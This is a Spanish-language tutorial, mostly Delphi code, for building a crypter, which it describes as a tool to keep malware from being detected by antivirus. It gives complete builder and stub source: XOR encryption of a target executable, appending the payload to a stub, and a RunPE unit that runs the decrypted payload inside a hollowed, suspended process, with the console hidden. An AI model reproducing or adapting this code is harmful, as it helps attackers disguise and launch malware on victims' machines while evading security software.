[Titulo] : Creacion de un Crypter
[Lenguaje] : Delphi
[Autor] : Doddy Hackman

[Temario]

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0x01 : Introduccion
0x02 : Creacion del Builder
0x03 : Creacion del Stub
0x04 : Probando el Crypter
0x05 : Creditos

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0x01 : Introduccion

Un crypter es un programa para ocultar malware para que no sea detectado y eliminado por los antivirus , en este manual aprenderemos a hacer un cryper en Delphi 7.
Solo les voy a enseñar como hacerlo , les voy avisando que no sera FUD y lo hago solo en Delphi 7 por varias razones ya que Delphi XE2 me daba muchos errores en este tema.

Empecemos ...

0x02 : Creacion del Builder

Para empezar cargamos Delphi 7 y nos vamos "File->New->Application" como en la siguiente imagen :

Imagen


Despues agregamos los siguientes elementos al formulario :

* 1 Edit (En Standard)
* 2 Botones (En Standard)
* 1 OpenDialog (En Dialogs)

El Edit contendra la ruta del archivo a encriptar , el primer boton sera para buscar el archivo , el segundo boton para encriptar el archivo y finalmente el OpenDialog lo usaremos para que el usuario pueda seleccionar el archivo.

Entonces al primer boton lo ponemos al lado del Edit1 y le ponemos de texto al boton : "Load" , el segundo boton viene abajo del Edit1 y le ponemos de texto "Encrypt"

Tambien si quieren pueden poner un titulo al Form desde la opcion de "Caption" del formulario , en mi caso pongo "Crypter".

El formulario les deberia quedar asi :

Imagen


Entonces hacemos doble click en el boton "Load" y ponemos el siguiente codigo :
procedure TForm1.Button1Click(Sender: TObject);
begin
  if OpenDialog1.Execute then // Abrimos el OpenDialog para insertar la ruta
  // del archivo a encriptar
  begin
    Edit1.Text := OpenDialog1.FileName; // Establecemos el texto de Edit1 con
    // la ruta del archivo marcado en el openDialog1
  end;
end;
Ahora hacemos doble click en el boton "Encrypt" y ponemos el siguiente codigo :
procedure TForm1.Button2Click(Sender: TObject);
var
  codigo: string; // Declaramos la variable "codigo" como string
  key: integer; // Declaramos la variable "key" como integer
  separador: string; // Declaramos la variable "separador" como string
  linea: string; // Declaramos la variable "linea" como string
begin

  separador := '-barra-';
  // Establecemos el valor que tendra la variable "separador"
  key := 123; // Establecemos el valor de la variable "key" como 123

  codigo := xor_now(leer_archivo(Edit1.Text), key);
  // Leemos el archivo que hay en
  // la caja de texto y encriptamos con XOR el contenido usando una key

  CopyFile(Pchar(ExtractFilePath(Application.ExeName) + '/' + 'stub.exe'),
    Pchar(ExtractFilePath(Application.ExeName) + '/' + 'done.exe'), True);
  // Copiamos el stub.exe con el nombre de done.exe

  linea := separador + codigo + separador + IntToStr(key) + separador;
  // Establecemos
  // la variable "linea" con el valor de contenido del archivo encriptado con
  // XOR y la key del cifrado XOR

  escribir_datos('done.exe', '-acatoy1-', '-acatoy2-', linea); // Escribimos
  // los datos en el ejecutable done.exe marcando los delimtiadores "acatoy" y
  // tambien ponemos el valor de la variable "linea"
  
  ShowMessage('Done');

end;
El codigo les deberia quedar algo asi :

Imagen


Para poder usar este codigo debemos crear una Unit llendo a "File->New->Unit" como en la siguiente imagen :

Imagen


Una vez creada pongan el siguiente codigo :
// Unit : Tools for Crypter
// Coded By Doddy Hackman in the year 2015
// Credits : Based on OP Crypter By Xash
// Thanks to Xash

unit tools;

interface

uses SysUtils, Windows;

function leer_datos(archivo, delimitador1, delimitador2: string): string;
function escribir_datos(ruta, delimitador1, delimitador2, texto: string): bool;

function leer_archivo(archivo_a_leer: String): AnsiString;
function xor_now(texto: string; clave: integer): string;

implementation

function xor_now(texto: string; clave: integer): string;
var
  numero: integer; // Establecemos la variable "numero" como integer
  contenido: string; // Establecemos la variable "contenido" como string
begin
  contenido := ''; // Vaciamos el contenido de la variable "contenido"
  for numero := 1 to Length(texto) do // Realizamos un for empezando por 1 hasta
  // la longitud de la variable "texto"
  begin
    contenido := contenido + Char(integer(texto[numero]) xor clave);
    // Encriptamos los datos
    // con XOR
  end;
  Result := contenido; // Devolvemos el resultado de la funcion como el valor
  // de la variable "contenido"
end;

function leer_archivo(archivo_a_leer: String): AnsiString;
var
  archivo: File; // Declaramos la variable "archivo" como File
  tipo: Byte; // Declaramos la variable "tipo" como Byte
begin
  tipo := FileMode; // Establecemos el FileMode para abrir el archivo
  try
    FileMode := 0; // Establecemos como "0" el FileMode
    AssignFile(archivo, archivo_a_leer); // Abrirmos el archivo
{$I-}
    Reset(archivo, 1); // Leemos el archivo desde la primera linea
{$I+}
    if IoResult = 0 then // Si IoResult es 0 ...
      try
        SetLength(Result, FileSize(archivo)); // Establecemos la longitud la
        // variable "Result" como la longitud del archivo
        if Length(Result) > 0 then
        // Si la longitud del resultado es mayor a 0 ...
        begin
{$I-}
          BlockRead(archivo, Result[1], Length(Result)); // Leemos los datos
{$I+}
          if IoResult <> 0 then // Si es distinto a 0 ..
            Result := '';
        end;
      finally
        CloseFile(archivo); // Cerramos el archivo
      end;
  finally
    FileMode := tipo; // Declaramos la variable FileMode como la variable "tipo"
  end;
end;

function leer_datos(archivo, delimitador1, delimitador2: string): string;

var
  contenido: string; // Declaramos la variable "contenido" como string
  limite: integer; // Declaramos la variable "limite" como integer
  dividiendo: integer; // Declaramos la variable "dividiendo" como integer
  dividiendo2: integer; // Declaramos la variable "dividiendo2" como integer
  dividiendo3: integer; // Declaramos la variable "dividiendo3" como integer
  dividiendo4: integer; // Declaramos la variable "dividiendo4" como integer
  control1: integer; // Declaramos la variable "control1" como integer
  control2: integer; // Declaramos la variable "control2" como integer
  suma: integer; // Declaramos la variable "suma" como integer
  numero: integer; // Declaramos la variable "numero" como integer
  suma_inicial_1: integer; // Declaramos la variable suma_inicial_1 como integer
  suma_inicial_2: integer; // Declaramos la variable suma_inicial_2 como integer
  suma_casi_1: integer; // Declaramos la variable suma_casi_1 como integer
  suma_casi_2: integer; // Declaramos la variable suma_casi_2 como integer
  resultado: string; // Declaramos la variable "resultado" como string
  contenido_final: string;
  // Declaramos la variable "contenido_final" como string
begin

  if (FileExists(archivo)) then // Si existe el archivo ...
  begin
    contenido := leer_archivo(archivo); // Leemos el archivo y guardamos todo
    // en la variable "contenido"

    suma_inicial_1 := Length(delimitador1);
    // Calculamos la longitud de la variable
    // "delimitador1"

    suma_inicial_2 := Length(contenido);
    // Calculamos la longitud de la variable
    // "contenido"

    suma := Pos(delimitador1, contenido) + suma_inicial_1;
    // Calculamos la posicion del
    // "delimitador" en la variable "contenido"

    dividiendo := suma_inicial_2 - suma;
    // Restamos las variables "suma_inicial_2"
    // y "suma"
      dividiendo2 := suma_inicial_2 - dividiendo;
    // Restamos las variables "suma_inicial_2"
    // y "dividiendo"

    contenido := Copy(contenido, dividiendo2, suma_inicial_2);
    // Copiamos las variables y las guardmamos en "contenido"

    suma_casi_1 := Pos(delimitador1, contenido);
    // Calculamos la posicion de "delimitador1"
    // en la variable "contenido"
    suma_casi_2 := suma_casi_1 + suma_inicial_1;
    // Sumamos las variables "suma_casi_1"
    // y "suma_inicial_1"

    control1 := Pos(delimitador2, contenido) - suma_casi_2;
    // Calculamos la posicion
    // de "delimitador2" en la variable "contenido" y lo restamos con "suma_casi_2"

    control2 := control1 - 1; // Restamos en uno la variable "control1"

    for numero := 0 to control2 do
    // Realizamos un for usando desde 0 hasta el valor
    // de la variable "control2"
    begin
      dividiendo3 := suma_inicial_1 + numero;
      // Sumamos la variables varibles "suma_inicial_1"
      // y "numero"
      dividiendo4 := Pos(delimitador1, contenido) + dividiendo3;
      // Calculamos la posicion de "delimitador1" en la variable
      // "contenido"
      contenido_final := contenido[dividiendo4]; // "Usamos la posicion que esta
      // en la variable "dividiendo4" para acceder a cierta posicion de la variable
      // "contenido"
      resultado := resultado + contenido_final;
      // Sumamos las variables "resultado" y
      // "contenido_final"
    end;

    if resultado = '' then // Si la variable "resultado" esta vacia ...
    begin
      resultado := 'Error'; // Mostramos "Error" en la variable "resultado"
    end
    else
    begin
      Result := resultado; // De lo contrario mostramos el contenido de la
      // variable "resultado" en resultado de la funcion
    end;
  end
  else
  begin
    Result := 'Error'; // De lo contrario mostramos "Error" en el resultado de
    // la funcion
  end;
end;

function escribir_datos(ruta, delimitador1, delimitador2, texto: string): bool;
var
  abriendo_archivo: TextFile; // Declaramos la variable "abriendo_archivo" como
  // TextFile
begin
  if (FileExists(ruta)) then // Si el archivo de la variable "ruta" existe ...
  begin
    AssignFile(abriendo_archivo, ruta); // Abrimos el archivo de la variable
    // "ruta"
    Append(abriendo_archivo); // Empezamos a leer el archivo desde la variable
    // "abriendo_archivo"
    try
      begin
        WriteLn(abriendo_archivo, delimitador1 + texto + delimitador2);
        // Escribimos los datos
        // de las variables "delimitador1,"texto","delimitador2"
      end
    finally
      begin
        CloseFile(abriendo_archivo); // Cerramos el archivo desde la variable
        // "abriendo_archivo"
      end;
      Result := True; // Devolvemos "True" como resultado de la funcion
    end;
  end
  else
  begin
    Result := False; // De lo contrario devolvemos "False" como resultado de la
    // funcion
  end;

end;

end.

// The End ?
Y para terminar la Unit guardenla con el nombre de "tools".

Les deberia quedar algo asi :

Imagen


Para conectar el formulario con la Unit debemos ir a los "uses" que estan al inicio del codigo del formulario y agregar "tools" al final , quedando asi :
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls,tools;
Para finalizar guardamos el proyecto como "builder" y con esto ya terminamos el builder.

0x03 : Creacion del Stub

Para empezar tenemos que crear un proyecto en el mismo directorio que el del builder , pero esta vez tiene que ser un programa consola , para eso nos vamos a "File->New->Other" y despues en la ventana que viene seleccionamos "Console Application" , con imagenes seria asi :

Imagen


Imagen


Ahora deben agregar el unit "uExecFromMem" que es el Runpe hecho por steve10120 , para crear el Unit vamos a "File->New->Unit" como en la siguiente imagen :

Imagen


Una vez creado ponemos el siguiente codigo :
{ uExecFromMem

  Author: steve10120
  Description: Run an executable from another's memory.
  Credits: Tan Chew Keong: Dynamic Forking of Win32 EXE; Author of BTMemoryModule: PerformBaseRelocation().
  Reference: http://www.security.org.sg/code/loadexe.html
  Release Date: 26th August 2009
  Website: http://ic0de.org
  History: First try

  Additions by testest 15th July 2010:
    - Parameter support
    - Win7 x64 support
}

unit uExecFromMem;

interface

uses Windows;

function ExecuteFromMem(szFilePath, szParams: string; pFile: Pointer):DWORD;

implementation

function NtUnmapViewOfSection(ProcessHandle:DWORD; BaseAddress:Pointer):DWORD; stdcall; external 'ntdll';

type
  PImageBaseRelocation = ^TImageBaseRelocation;
  TImageBaseRelocation = packed record
     VirtualAddress: DWORD;
     SizeOfBlock: DWORD;
  end;

procedure PerformBaseRelocation(f_module: Pointer; INH:PImageNtHeaders; f_delta: Cardinal); stdcall;
var
  l_i: Cardinal;
  l_codebase: Pointer;
  l_relocation: PImageBaseRelocation;
  l_dest: Pointer;
  l_relInfo: ^Word;
  l_patchAddrHL: ^DWord;
  l_type, l_offset: integer;
begin
  l_codebase := f_module;
  if INH^.OptionalHeader.DataDirectory[5].Size > 0 then
  begin
    l_relocation := PImageBaseRelocation(Cardinal(l_codebase) + INH^.OptionalHeader.DataDirectory[5].VirtualAddress);
    while l_relocation.VirtualAddress > 0 do
    begin
      l_dest := Pointer((Cardinal(l_codebase) + l_relocation.VirtualAddress));
      l_relInfo := Pointer(Cardinal(l_relocation) + 8);
      for l_i := 0 to (trunc(((l_relocation.SizeOfBlock - 8) / 2)) - 1) do
      begin
        l_type := (l_relInfo^ shr 12);
        l_offset := l_relInfo^ and $FFF;
        if l_type = 3 then
        begin
          l_patchAddrHL := Pointer(Cardinal(l_dest) + Cardinal(l_offset));
          l_patchAddrHL^ := l_patchAddrHL^ + f_delta;
        end;
        inc(l_relInfo);
      end;
      l_relocation := Pointer(cardinal(l_relocation) + l_relocation.SizeOfBlock);
    end;
  end;
end;

function AlignImage(pImage:Pointer):Pointer;
var
  IDH:          PImageDosHeader;
  INH:          PImageNtHeaders;
  ISH:          PImageSectionHeader;
  i:            WORD;
begin
  IDH := pImage;
  INH := Pointer(Integer(pImage) + IDH^._lfanew);
  GetMem(Result, INH^.OptionalHeader.SizeOfImage);
  ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
  CopyMemory(Result, pImage, INH^.OptionalHeader.SizeOfHeaders);
  for i := 0 to INH^.FileHeader.NumberOfSections - 1 do
  begin
    ISH := Pointer(Integer(pImage) + IDH^._lfanew + 248 + i * 40);
    CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(pImage) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
  end;
end;

function Get4ByteAlignedContext(var Base: PContext): PContext;
begin
  Base := VirtualAlloc(nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
  Result := Base;
  if Base <> nil then
    while ((DWORD(Result) mod 4) <> 0) do
      Result := Pointer(DWORD(Result) + 1);
end;

function ExecuteFromMem(szFilePath, szParams:string; pFile:Pointer):DWORD;
var
  PI:           TProcessInformation;
  SI:           TStartupInfo;
  CT:           PContext;
  CTBase:       PContext;
  IDH:          PImageDosHeader;
  INH:          PImageNtHeaders;
  dwImageBase:  DWORD;
  pModule:      Pointer;
  dwNull:       DWORD;
begin
  if szParams <> '' then szParams := '"'+szFilePath+'" '+szParams;

  Result := 0;
  IDH := pFile;
  if IDH^.e_magic = IMAGE_DOS_SIGNATURE then
  begin
    INH := Pointer(Integer(pFile) + IDH^._lfanew);
    if INH^.Signature = IMAGE_NT_SIGNATURE then
    begin
      FillChar(SI, SizeOf(TStartupInfo), #0);
      FillChar(PI, SizeOf(TProcessInformation), #0);
      SI.cb := SizeOf(TStartupInfo);
      if CreateProcess(PChar(szFilePath), PChar(szParams), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
      begin
        CT := Get4ByteAlignedContext(CTBase);
        if CT <> nil then
        begin
          CT.ContextFlags := CONTEXT_FULL;
          if GetThreadContext(PI.hThread, CT^) then
          begin
            ReadProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @dwImageBase, 4, dwNull);
            if dwImageBase = INH^.OptionalHeader.ImageBase then
            begin
              if NtUnmapViewOfSection(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase)) = 0 then
                pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
              else
                pModule := VirtualAllocEx(PI.hProcess, nil, INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            end
            else
              pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if pModule <> nil then
            begin
              pFile := AlignImage(pFile);
              if DWORD(pModule) <> INH^.OptionalHeader.ImageBase then
              begin
                PerformBaseRelocation(pFile, INH, (DWORD(pModule) - INH^.OptionalHeader.ImageBase));
                INH^.OptionalHeader.ImageBase := DWORD(pModule);
                CopyMemory(Pointer(Integer(pFile) + IDH^._lfanew), INH, 248);
              end;
              WriteProcessMemory(PI.hProcess, pModule, pFile, INH.OptionalHeader.SizeOfImage, dwNull);
              WriteProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @pModule, 4, dwNull);
              CT.Eax := DWORD(pModule) + INH^.OptionalHeader.AddressOfEntryPoint;
              SetThreadContext(PI.hThread, CT^);
              ResumeThread(PI.hThread);
              Result := PI.hThread;
            end;
          end;
          VirtualFree(CTBase, 0, MEM_RELEASE);
        end;
        if Result = 0 then
          TerminateProcess(PI.hProcess, 0);
      end;
    end;
  end;
end;

end.
Para terminar guardamos la Unit como "uExecFromMem" y el codigo nos quedaria algo asi :

Imagen


Ahora tenemos que agregar los siguientes "uses" al codigo del Stub :
uses
  SysUtils, StrUtils, Windows, uExecFromMem, tools;
Despues borren el "{$APPTYPE CONSOLE}" al inicio del codigo para que no se vea la consola al cargar el Stub.

Ahora debemos agregar el siguiente codigo que nos servira para usar arrays en el Stub.

El codigo :
type
  otro_array = array of string;
  // Declaramos el tipo "otro_array" como array of string
Despues tenemos que agregar la siguiente funcion para manejar los arrays y los datos del Stub.

El codigo :
procedure regex2(texto: string; separador: string; var resultado: otro_array);
// Thanks to ecfisa for the help
var
  numero1: integer; // Declaramos la variable "numero1" como integer
  numero2: integer; // Declaramos la variable "numero2" como integer
begin
  texto := texto + separador; // Concatenamos la variable "texto" y "separador"
  numero2 := Pos(separador, texto); // Calculamos la posicion de "separador" en
  // la variable "texto"
  numero1 := 1; // Establecemos la variable "numero1" como "1"
  while numero1 <= numero2 do
  // Mientras "numero1" sea menor o igual a "numero2" ...
  begin
    SetLength(resultado, Length(resultado) + 1);
    // Establecemos la longitud de resultado
    // a la longitud de la variable "resultado" mas "1"
    resultado[High(resultado)] := Copy(texto, numero1, numero2 - numero1);
    // Establecemos la variable "resultado" como la copia de las variables "texto",
    // "numero1" y la resta de las variables "numero2" y "numero1"
    numero1 := numero2 + Length(separador);
    // Establecemos la variable "numero1" como
    // la suma de la variable "numero2" y la longitud de ña variable "separador"
    numero2 := PosEx(separador, texto, numero1); // Calculamos la posicion de de
    // "separador" en el variable "texto"
  end;
end;
Ahora agregamos el siguiente codigo entre el begin principal.

El codigo :
var
  todo: string; // Declaramos la variable "todo" como string
  codigo: string; // Declaramos la variable "codigo" como string
  key: string; // Declaramos la variable "key" como string
  datos: otro_array; // Declaramos la variable "datos" como otro_array

begin

  todo := leer_datos(paramstr(0), '-acatoy1-', '-acatoy2-'); // Leemos los datos
  // del ejecutable mismo usando los delimitadores "-acatoy1-" y "-acatoy2-"

  regex2(todo, '-barra-', datos);
  // Separamos los delimitadores que estan separados
  // por "-barra-" en la variable "todo"

  key := datos[2];
  // Establecemos como "key" la segunda posicion del array "datos"
  codigo := datos[1];
  // Establecemos como "codigo" la primera posicion del array
  // "datos"

  codigo := xor_now(codigo, StrToInt(key)); // Establecemos como "codigo"
  // la encriptacion XOR del contenido de la variable "codigo" usando la key y lo
  // guardamos en la variable "codigo"

  ExecuteFromMem(paramstr(0), '', Pchar(codigo));
  // Ejecutamos el codig en memoria
  // usando la funcion "ExecuteFromMem"

end.
Una imagen de como deberia quedarles el codigo :

Imagen


Para terminar guardamos el proyecto como "stub" y podriamos dar por terminado este corto capitulo.

0x04 : Probando el Crypter

Para probar el Crypter vamos a probarlo con una copia del programa mismo para encriptar , entonces hacemos una copia del builder y cargamos el builder principal para despues hacer click en el boton "Load" y seleccionar la copia del builder , despues hacemos click en "Encrypt" , si todo sale bien les va a aparecer un mensaje que dice "Done" , entonces veremos que el builder nos genero un ejecutable llamado "done.exe" , ese es el programa encriptado , simplemente lo abrimos y veremos el builder encriptado.

Unas imagenes :

Imagen


Imagen


Imagen


Imagen


Con ven el Crypter funciona correctamente.

0x05 : Creditos

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Eso seria todo.

--========--
The End ?
--========--

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Version en VideoTutorial :

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